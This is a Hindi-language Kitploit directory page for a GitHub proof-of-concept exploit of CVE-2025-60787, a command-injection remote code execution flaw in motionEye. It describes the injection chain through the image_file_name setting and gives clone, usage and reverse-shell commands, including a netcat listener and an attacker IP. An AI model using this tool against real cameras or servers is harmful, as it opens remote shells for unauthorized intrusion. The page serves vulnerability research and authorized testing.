Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye प्रमाणीकृत कमांड इंजेक्शन RCE PoC | Kitploit
उपकरण/GitHubGitHub/ozcanpng/cve-2025-60787
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye प्रमाणीकृत कमांड इंजेक्शन RCE PoC

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-60787 — motionEye प्रमाणित RCE

CVE-2025-60787 के लिए प्रमाणित कमांड इंजेक्शन PoC। motionEye v0.43.1b4 और पुराने संस्करण उपयोगकर्ता-नियंत्रित कैमरा कॉन्फ़िगरेशन मानों जैसे image_file_name को पर्याप्त सैनिटाइज़ेशन के बिना Motion कॉन्फ़िगरेशन में लिखते हैं, जिससे मान संसाधित होने पर कमांड निष्पादन संभव हो जाता है।

केवल अधिकृत परीक्षण और शोध के लिए। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।


यह क्या करता है

root@kitploit:~
Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. लक्ष्य को सत्यापित करता है और motionEye का पता लगाता है।
  2. कॉन्फ़िगर किए गए उपयोगकर्ता नाम और पासवर्ड हैश का उपयोग करके हस्ताक्षरित motionEye API अनुरोध उत्पन्न करता है।
  3. /config/list/ के माध्यम से कैमरा कॉन्फ़िगरेशन पढ़ता है।
  4. कैमरा image_file_name सेटिंग में एक कमांड इंजेक्ट करता है।
  • आवश्यकता होने पर स्टिल इमेज/मैन्युअल स्नैपशॉट सक्षम करता है।
  • /action/<camera_id>/snapshot/ ट्रिगर करता है ताकि motionEye इंजेक्ट की गई फ़ाइल नाम को संसाधित करे।
  • वैकल्पिक रूप से मूल कैमरा कॉन्फ़िगरेशन को पुनर्स्थापित करता है।

  • स्क्रीनशॉट

    रिवर्स शेल सेटअप

    रिवर्स शेल सेटअप

    कॉन्फ़िगरेशन इंजेक्शन और ट्रिगर

    कॉन्फ़िगरेशन इंजेक्शन और ट्रिगर

    शेल प्राप्त हुआ

    शेल प्राप्त हुआ


    सेटअप

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2025-60787.git
    cd CVE-2025-60787
    pip install -r requirements.txt
    

    उपयोग

    सुरक्षित कमांड प्रमाण

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --user admin \
      --password-hash HASH \
      --cmd 'id > /tmp/motioneye_rce'
    

    रिवर्स शेल

    पहले एक लिसनर प्रारंभ करें:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    फिर चलाएँ:

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --port 8765 \
      --user admin \
      --password-hash HASH \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    उपयोगी विकल्प:

    root@kitploit:~
    --camera-id N      Camera ID to modify (default: 1)
    --restore          Restore the original camera configuration after triggering
    --dry-run          Build signed requests without modifying the target
    --debug            Print canonical signed paths, bodies and signatures
    --no-trigger       Update config without triggering a snapshot
    --verify-tls       Verify HTTPS certificates
    --yes              Skip reverse-shell confirmation prompt
    

    प्रभावित

    उत्पादप्रभावित संस्करणआवश्यक पहुँचप्रभाव
    motionEye<= 0.43.1b4प्रमाणित व्यवस्थापक/API पहुँचmotionEye/Motion प्रक्रिया उपयोगकर्ता के रूप में OS कमांड निष्पादन

    परिणामी विशेषाधिकार इस बात पर निर्भर करता है कि motionEye कैसे तैनात किया गया है। ऐसे कंटेनरों या लैब इमेजों में जहाँ सेवा root के रूप में चलती है, कमांड निष्पादन root के रूप में ही हो सकता है।


    नोट्स

    • PoC संग्रहीत motionEye पासवर्ड मान/हैश की अपेक्षा करता है क्योंकि वह मान लीगेसी API अनुरोधों के लिए हस्ताक्षर कुंजी के रूप में उपयोग किया जाता है।
    • इंजेक्ट किया गया फ़ील्ड image_file_name है।
    • शोषण के बाद मूल कैमरा कॉन्फ़िगरेशन को वापस रखने के लिए परीक्षण के दौरान --restore का उपयोग करें।
    • रिवर्स शेल का प्रयास करने से पहले सुरक्षित सत्यापन के लिए --cmd को प्राथमिकता दें।

    संदर्भ

    • NVD — CVE-2025-60787
    • GitHub Security Advisory — GHSA-j945-qm58-4gjx
    • motionEye परियोजना

    लेखक

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    टूल डाउनलोड करें